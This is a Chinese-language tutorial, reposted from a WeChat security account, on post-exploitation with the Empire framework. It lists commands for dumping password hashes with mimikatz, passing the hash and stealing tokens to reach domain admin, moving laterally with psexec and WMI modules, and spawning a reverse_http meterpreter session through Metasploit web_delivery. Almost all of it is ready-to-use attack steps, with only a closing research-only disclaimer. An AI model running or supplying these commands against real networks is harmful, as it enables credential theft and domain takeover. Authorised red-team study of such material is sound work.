转自:哈拉少安全小队
#001 获取密码hash
1、内置mimikatz:
mimikatz #执行会有点缓慢,执行成功即可抓取hash
2、creds命令:
creds
creds<空格>+<双击tab键> 可以看到扩展命令
当内网很复杂,hash很多时,可以通过export导出为csv文件
crds export /root/hash #会自动添加文件后缀
结果如下:
#002 横向移动模块
1、令牌窃取配合hash传递:
①执行mimikatz后
creds #列出所有Empire获取到的密码
②当发现列举出的creds中,有域高权限用户时,使用hash传递方式攻击:
pth
然后就能看见PID号,窃取该PID进程的令牌即可
steal_token
即可成功获取域管权限
2、横向移动常用模块:
①invoke-psexec:
usemodule lateral_movement/invoke_psexec
set ComputerName <目标计算机名>
set Listener <监听器名称>
成功会返回目标机器的agent会话
②invoke-wmi:
usemodule lateral_movement/invoke_wmi
set ComputerName <目标计算机名>
set Listener <监听器名称>
成功会返回目标机器的agent会话
③其他模块根据实际情况选用即可
usemodule lateral_movement/ #tab键列出模块
#003 转为MSF会话
Invoke-MetasploitPayload<-->web_delivery(MSF):
①MSF执行:
use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_http
set lhost
set lpotr <监听端口>
exploit
②Empire执行:
usemodule code_execution/invoke_metasploitpayload
set URL
execute
执行成功后,MSF会上线一个新的meterpreter会话
如侵权请私聊公众号删文
好文推荐
欢迎关注 系统安全运维
原文始发于微信公众号(系统安全运维):【Empire系列】横向移动相关
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论